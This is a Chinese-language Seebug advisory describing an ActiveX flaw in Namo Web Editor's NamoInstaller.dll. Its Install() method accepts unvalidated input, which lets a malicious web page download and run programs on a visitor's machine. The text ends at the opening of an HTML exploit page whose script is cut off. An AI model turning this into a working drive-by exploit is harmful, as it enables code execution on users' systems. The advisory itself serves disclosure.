Namo Web Editor NamoInstaller.dll ActiveX控件任意命令执行漏洞

2008-01-30T00:00:00
ID SSV:2878
Type seebug
Reporter Root
Modified 2008-01-30T00:00:00

Description

BUGTRAQ ID: 27453

Namo Web Editor是一个软件包,允许Web应用人员为网站用户提供创建文档、上传文件等支持。

Namo Web Editor的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞在用户系统上执行任意命令。

Namo Web Editor软件包中所安装的NamoInstaller.NamoInstall.1 ActiveX控件(NamoInstaller.dll)没有正确地验证对Install()方式的输入参数,如果用户受骗访问了恶意网页并向该方式传送了恶意参数的话,就可能导致下载并执行恶意程序。

SJ NAMO Web Editor NamoInstaller.dll 3.0.0.1 厂商补丁:

SJ NAMO

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.namo.com/ target=_blank>http://www.namo.com/</a>

                                        
                                            
                                                &lt;html&gt;
&lt;head&gt;
&lt;html&gt;
&lt;head&gt;
&nbsp;&nbsp;&lt;title&gt;Namo&nbsp;Web&nbsp;Editor&nbsp;NamoInstaller.dll&nbsp;install&nbsp;Method&nbsp;Exploit&lt;/title&gt;
&nbsp;&nbsp;&lt;script&nbsp;language=